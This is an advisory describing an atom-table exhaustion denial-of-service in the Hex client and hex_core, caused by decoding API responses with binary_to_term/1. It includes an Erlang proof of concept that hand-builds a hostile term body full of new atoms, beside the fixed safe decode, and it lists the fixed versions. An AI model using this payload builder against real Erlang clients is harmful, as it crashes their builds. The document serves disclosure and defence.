Hexpm Hex Core Uncontrolled Resource Consumption Vulnerability Allowing Object Injection

Vulnerability

A deserialization flaw has been identified in the Hex client (hex, versions 2.3.0 up to the fix in 2.3.2) and in the hex_core library it is built on (versions before 0.12.2). The Hex API module decodes response bodies from the Hex API with `binary_to_term/1`, that is, without the `safe` option, so Erlang terms received from the network are deserialized without restriction (deserialization of untrusted data, which the advisory also classifies as object injection). Every atom contained in such a term is interned in the VM's atom table, which is never garbage collected, so a response carrying enough previously unseen atoms exhausts the table and crashes the Erlang virtual machine.

Impact

Exploitation crashes the Erlang virtual machine that hosts the Hex client (for example the build process fetching packages) by exhausting its atom table, a denial of service against the build. The atom table is never reclaimed, so the only recovery is restarting the VM.

Reproduction

To reproduce, an attacker who controls the response the Hex client receives from the Hex API (for example by pointing the client at a hostile server) returns a body in the Erlang external term format containing a large number of atoms that do not yet exist in the client VM. The vulnerable client passes this body to `binary_to_term/1` without the `safe` option, so every atom is interned; once the number of atoms exceeds the VM's atom limit (`erlang:system_info(atom_limit)`, 1,048,576 by default), the runtime aborts, which is the denial of service. With `binary_to_term(Body, [safe])`, decoding fails with `badarg` as soon as a term would create a new atom, and the atom table is not affected.
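The following Erlang module is an added illustration of the mechanism described above, not code from hex or hex_core. It places the vulnerable decode (`binary_to_term/1`) beside the hardened one (`binary_to_term/2` with `[safe]`), builds a constructed hostile response body by hand so that the crafting side does not intern the atoms itself, and measures the atom table before and after decoding. Module and function names (`hex_term_decode`, `craft_atom_list/2`, `demo/0`) and the `hex_poc_atom_` prefix are this example's own choices.

```erlang
-module(hex_term_decode).
-export([decode_unsafe/1, decode_safe/1, craft_atom_list/2, demo/0]).

%% Vulnerable pattern, as described in the advisory: the response body is
%% decoded with binary_to_term/1. Every atom in it is interned in the atom
%% table, which is never garbage collected.
decode_unsafe(Body) when is_binary(Body) ->
    binary_to_term(Body).

%% Hardened pattern: with [safe], decoding fails with badarg on any term
%% that would create a new atom (directly, or inside a pid, ref or fun) or
%% a new external function reference, so nothing is interned.
decode_safe(Body) when is_binary(Body) ->
    try binary_to_term(Body, [safe]) of
        Term -> {ok, Term}
    catch
        error:badarg -> {error, unsafe_term}
    end.

%% Constructed hostile response body: a list of N atoms the decoding VM has
%% never seen. The External Term Format is assembled by hand so that the
%% crafting side does not intern the atoms itself, which term_to_binary/1 on
%% list_to_atom/1 results would do. Tags used: 131 version byte, 108
%% LIST_EXT (4-byte big-endian element count), 106 NIL_EXT tail,
%% 119 SMALL_ATOM_UTF8_EXT (1-byte length followed by the UTF-8 name).
craft_atom_list(Prefix, N) when is_binary(Prefix), N > 0 ->
    Elems = [small_atom(<<Prefix/binary, (integer_to_binary(I))/binary>>)
             || I <- lists:seq(1, N)],
    iolist_to_binary([<<131, 108, N:32/big>>, Elems, <<106>>]).

small_atom(Name) when byte_size(Name) =< 255 ->
    <<119, (byte_size(Name)):8, Name/binary>>.

%% Small-scale demonstration (1000 atoms, far below the limit). Run it once
%% per node: after the unsafe decode the atoms exist, so a second call
%% would see decode_safe/1 succeed. Raising N past
%% erlang:system_info(atom_limit) with decode_unsafe/1 really does abort
%% the VM, so do that only in a throwaway node.
demo() ->
    N = 1000,
    Body = craft_atom_list(<<"hex_poc_atom_">>, N),
    %% Safe decode first, while the atoms still do not exist: rejected.
    {error, unsafe_term} = decode_safe(Body),
    Before = erlang:system_info(atom_count),
    Atoms = decode_unsafe(Body),
    After = erlang:system_info(atom_count),
    N = length(Atoms),
    true = is_atom(hd(Atoms)),
    %% On a fresh node After - Before equals N; the atoms are now permanent.
    #{atoms_added => After - Before,
      atom_limit => erlang:system_info(atom_limit)}.
```

Compile and call `hex_term_decode:demo().` in a fresh `erl` shell; `atoms_added` comes back as 1000 and `atom_limit` as the node's configured ceiling (1,048,576 unless started with `+t`). The same fix applies on the Elixir side as `:erlang.binary_to_term(body, [:safe])`; note that `[safe]` only blocks terms that would allocate new atoms, references or funs, so a client that needs specific atoms in a response should still validate the decoded term against the shape it expects.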

Remediation

Fixed releases are Hex 2.3.2, hex_core 0.12.2 and Rebar3 3.27.0 (Rebar3 ships its own copy of hex_core). Update to the fixed version of whichever of these you use; instructions for updating can be found in the respective repositories.

Added: Feb 27, 2026, 6:19 PM
Updated: Feb 27, 2026, 6:19 PM

Vulnerability Rating

Custom Algorithm
spread: 2.4
impact: 2.5
exploitability: 5.4
remediation: 8.3
relevance: 3.3
threat: 4.8
urgency: 2.9
incentive: 0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.